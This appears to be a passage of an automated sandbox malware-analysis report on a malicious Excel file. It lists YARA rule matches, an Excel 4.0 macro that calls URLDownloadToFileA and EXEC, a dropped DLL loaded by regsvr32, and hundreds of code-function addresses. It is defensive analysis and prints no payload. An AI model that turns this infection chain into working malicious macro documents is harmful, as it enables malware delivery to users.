                        Source: Yara matchFile source: 00000006.00000002.1193348564.0000000000160000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.1193467860.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                        System Summary

                        barindex
                        Found malicious Excel 4.0 Macro
                        Source: Untitled-09112022.xlsMacro extractor: Sheet: Sheet7 contains: URLDownloadToFileA
                        Source: Untitled-09112022.xlsMacro extractor: Sheet: Sheet7 contains: URLDownloadToFileA
                        Office process drops PE file
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Ji8QgmpX3lS3yT[1].dllJump to dropped file
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\elv1.ooocccxxxJump to dropped file
                        Found Excel 4.0 Macro with suspicious formulas
                        Source: Untitled-09112022.xlsInitial sample: EXEC
                        Source: Untitled-09112022.xlsInitial sample: EXEC
                        Source: Untitled-09112022.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
                        Source: C:\Users\user\Desktop\Untitled-09112022.xls, type: DROPPEDMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
                        Source: C:\Users\user\Desktop\4DF60000, type: DROPPEDMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
                        Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\system32\FgEHLIiiJRN\Jump to behavior
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180044C30
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180031018
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800391F8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180020204
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001F22C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018003D23C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180029290
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180024460
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001F4B0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800204D0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018003459C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018003B5A0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800305F8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180017604
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001F74C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180032824
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180037854
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002B890
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000A93C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018003A9A0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001F9B4
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180026A0C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180028B30
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002B890
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001FC30
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180031C3C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180028B30
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018003AE50
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001FF10
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180032F94
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_002B0000
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02020310
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_020138A5
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_020348E0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0201B1E0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02019E38
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02030454
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02038C94
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02015DB4
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02014DDC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02038A04
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0202FA08
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02011A1C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0201BA24
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02031A2C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02029230
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02022244
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02012A7C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0202827C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02032A84
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02019298
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0202629C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0203629C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0201EAC4
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02017AF0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0202B2F0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02025B18
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02035B28
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0202D32C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02025334
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02037348
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02014B4C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02011B5C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02016B5C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02011364
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0201C364
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0201E368
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0201CB88
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0202FB88
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02023B88
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02032B8C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0201F3E0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02013BE8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02019BEC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02027BF8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_020273F8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02011000
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0201E828
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02012834
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0203005C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0201D864
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02016880
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0202308C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0202B898
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02034098
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_020210AC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_020248B0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_020178B6
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0201B8D0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_020138DC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_020298DC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02022110
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02039124
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02012128
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02030930
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02019144
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02020954
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0201F174
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0202C974
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02027198
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_020259A0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0201D1AC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_020169C0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0201D1C6
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0201A1D4
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_020179D8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0202C1DC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_020299E8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_020199EC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0202E614
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0201BE34
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02016650
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0202AE50
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02011660
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02021664
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0201C676
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0201CE7E
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02034680
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0201AE84
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02038690
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02017694
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02025694
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02023698
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0201569C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02037EA4
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_020196B8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02028ECC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0201E708
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0201871C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02031728
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0202CF30
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0201A734
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0201FF64
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0202E76C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02028778
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02022780
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02018FA0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02024FA4
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_020297AC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_020347B0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_020357B4
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02023FE0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02025400
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02033C0C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0201741C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02024C48
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02026464
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02015478
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0203748C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0201C498
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02014CA0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0201D4B2
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02011CCC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_020184F8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_020364F8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0201BD00
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02025508
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02028D0C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0202B520
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02019D24
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02023524
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02033D28
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0202F550
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02030D54
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02028560
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02039568
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0201E570
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02035D84
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02015590
                        Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_02021DAC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00130000
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00219E38
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0022FA08
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00212A7C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00232CBC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0021DA80
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00225694
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_002348E0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_002138DC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00220310
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0022D718
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0022E76C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00219144
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00215DB4
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_002357B4
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0021B1E0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00213BE8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_002273F8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00214DDC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0021BA24
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0021E828
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00231A2C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00229230
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0021BE34
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00212834
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00211000
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00225400
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00238A04
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00233C0C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0022E614
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00211A1C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0021741C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00211660
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0021D864
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00226464
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00221664
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00215478
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0022827C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00222244
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00224C48
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00216650
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0022AE50
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00230454
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0021C659
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0023005C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00214CA0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00237EA4
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_002210AC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_002248B0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0021D4B2
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_002178B6
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_002196B8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00216880
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00234680
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0021AE84
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00232A84
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0022308C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0023748C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00238690
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00217694
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00238C94
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00219298
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0021C498
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0022B898
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00223698
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00234098
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0021569C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0022629C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0023629C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00217AF0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0022B2F0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_002184F8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_002364F8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0021EAC4
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00211CCC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00228ECC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0021B8D0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_002298DC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0022B520
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00219D24
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00223524
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00239124
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00212128
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00231728
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00233D28
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00235B28
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0022D32C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0022CF30
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00230930
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0021A734
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00225334
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0021BD00
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0021E708
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00225508
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00228D0C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00222110
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00225B18
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0021871C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00228560
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00211364
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0021FF64
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0021C364
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0021E368
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00239568
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0021E570
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0021F174
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0022C974
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00228778
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00237348
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00214B4C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0022F550
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00220954
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00230D54
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00216B5C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00211B5C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00218FA0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_002259A0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00224FA4
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0021D1AC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_002297AC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00221DAC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_002347B0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00222780
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00235D84
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0022FB88
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00223B88
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00232B8C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00215590
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00227198
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0021F3E0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00223FE0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_002299E8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_002199EC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00219BEC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00227BF8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_002169C0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0021D1C6
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0021A1D4
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_002179D8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0022C1DC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_002E0000
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0204FA08
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02039E38
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0203DA80
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_020338A5
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02052CBC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_020548E0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02040310
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0204D718
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02039144
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02032F53
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0204E76C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_020557B4
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02035DB4
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02034DDC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0203B1E0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02033BE8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_020473F8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02058A04
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02031000
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02045400
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02053C0C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0204E614
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02031A1C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0203741C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0203BA24
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02051A2C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0203E828
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02049230
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0203BE34
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02032834
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02042244
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02044C48
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02050454
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02036650
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0204AE50
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0205005C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0203C659
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02046464
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02041664
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02031660
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0203D864
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0204827C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02035478
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02032A7C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02052A84
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02036880
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02054680
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0203AE84
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0204308C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0205748C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02045694
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02058C94
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02058690
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02037694
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0204629C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0205629C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02039298
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0203C498
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0204B898
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02043698
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02054098
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0203569C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02057EA4
